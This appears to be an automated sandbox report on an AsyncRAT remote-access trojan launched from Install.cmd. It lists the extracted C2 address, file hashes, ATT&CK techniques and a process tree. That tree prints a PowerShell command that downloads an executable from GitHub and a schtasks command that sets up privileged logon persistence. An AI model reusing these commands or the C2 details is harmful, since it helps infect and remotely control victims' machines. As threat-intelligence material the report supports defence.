asyncrat | e2025b1f07285cf7a6cb0dbcd05933db631202a3af5af06719548f01ba2fe73f

General

Target

Install.cmd
Size

407B
MD5

d605e519c8fb10ecc49055af63c0f213
SHA1

a69b61879040aa541258035461260159ea51369a
SHA256

1452be84cfc1ea5aee5db2011fe8e2a5b72ff2fe637b77696d720734f58eac89
SHA512

304e8825d0afa6f7235859bb2083d728510d48806b06214225978592e8c4f8d065e1bcf3ca9eb39d4312b762a83e1054237d11cecbb3347ef4868bb4574b0e2b

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

anyone-blogging.gl.at.ply.gg:22284

Attributes

delay
1
install
true
install_file
Windows.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0037000000016d6f-24.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2072	Windows.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2164	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2664	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2796	powershell.exe
2760	Loader.exe
2760	Loader.exe
2760	Loader.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2760	Loader.exe
Token: SeDebugPrivilege	2760	Loader.exe
Token: SeDebugPrivilege	2072	Windows.exe
Token: SeDebugPrivilege	2072	Windows.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 2760	2688	cmd.exe	31
PID 2688 wrote to memory of 2760	2688	cmd.exe	31
PID 2688 wrote to memory of 2760	2688	cmd.exe	31
PID 2688 wrote to memory of 2796	2688	cmd.exe	32
PID 2688 wrote to memory of 2796	2688	cmd.exe	32
PID 2688 wrote to memory of 2796	2688	cmd.exe	32
PID 2760 wrote to memory of 2716	2760	Loader.exe	33
PID 2760 wrote to memory of 2716	2760	Loader.exe	33
PID 2760 wrote to memory of 2716	2760	Loader.exe	33
PID 2760 wrote to memory of 2556	2760	Loader.exe	35
PID 2760 wrote to memory of 2556	2760	Loader.exe	35
PID 2760 wrote to memory of 2556	2760	Loader.exe	35
PID 2716 wrote to memory of 2664	2716	cmd.exe	37
PID 2716 wrote to memory of 2664	2716	cmd.exe	37
PID 2716 wrote to memory of 2664	2716	cmd.exe	37
PID 2556 wrote to memory of 2164	2556	cmd.exe	38
PID 2556 wrote to memory of 2164	2556	cmd.exe	38
PID 2556 wrote to memory of 2164	2556	cmd.exe	38
PID 2556 wrote to memory of 2072	2556	cmd.exe	39
PID 2556 wrote to memory of 2072	2556	cmd.exe	39
PID 2556 wrote to memory of 2072	2556	cmd.exe	39

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Install.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2664
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp280.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2164
  - - C:\Users\Admin\AppData\Roaming\Windows.exe
      "C:\Users\Admin\AppData\Roaming\Windows.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C ""Invoke-WebRequest -Uri 'https://github.com/Espiny/test/raw/main/MainDab.exe' -OutFile '\Users\Admin\AppData\Local\Temp\MainDab.exe'""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp280.tmp.bat

Filesize
150B

MD5
6550237b601970454980e23749329d85

SHA1
72d563998a3c07646e5ea140f1c8a857fabb246e

SHA256
521dfc6e6116c659e0f5c4e2fcf80abe6cdd94eeed4c1bea7caf25c7d19cd834

SHA512
525cca52d66ccc88ab8cdc1344b0dd90fde8b6860a8762ab743488ac5ba90197e0d743fe170bdd4071aa1a004cbc0d54c78429ea367714655cfc8dbe119abc2b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows.exe

Filesize
63KB

MD5
004ba87604ac07c77d161b96bfd97a34

SHA1
8f089b87f831946c617af9702ba79d20ddaf7394

SHA256
bfbef5852faa1e2de88f380c620af93eb08114363c1d72d74d5809e7ff70f881

SHA512
322a6fc44d0390ad55a7bf0cfe268814e00df2e757a8088d11d7addd9d2b089e4c62d4c955f2272b7ec50033e68a59f72778912cbae125e01c5b74c1b2909b8a

Download Submit
memory/2072-26-0x0000000000C10000-0x0000000000C26000-memory.dmp

Filesize
88KB

Download
memory/2760-13-0x0000000000F50000-0x0000000000FD0000-memory.dmp

Filesize
512KB

Download
memory/2760-6-0x0000000001060000-0x0000000001076000-memory.dmp

Filesize
88KB

Download
memory/2760-4-0x000007FEF59D3000-0x000007FEF59D4000-memory.dmp

Filesize
4KB

Download
memory/2796-9-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-11-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-12-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-7-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

Filesize
2.9MB

Download
memory/2796-8-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2796-10-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-5-0x000007FEF52EE000-0x000007FEF52EF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads